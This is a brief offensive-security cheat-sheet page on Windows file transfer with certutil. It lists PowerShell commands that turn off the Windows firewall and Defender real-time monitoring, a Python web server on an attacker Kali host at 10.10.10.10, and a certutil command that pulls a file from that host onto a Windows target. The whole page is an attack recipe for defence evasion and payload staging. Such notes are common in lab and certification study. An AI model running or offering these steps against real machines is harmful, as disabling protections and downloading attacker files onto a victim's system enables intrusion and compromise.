Certutil

1)If necessary use powershell to disable firewall

Set-NetFirewallProfile -Enabled False
Set-MpPreference -DisableRealtimeMonitoring $true

2)Spin an Apache or python3 server on port 8000, Kali $ip 10.10.10.10

#Kali: 
python3 -m http.server 8000 

3)Download from windows target

certutil -urlcache -f http://10.10.10.10/file.txt file.txt
#(important to specify the name of the outfile)

Last updated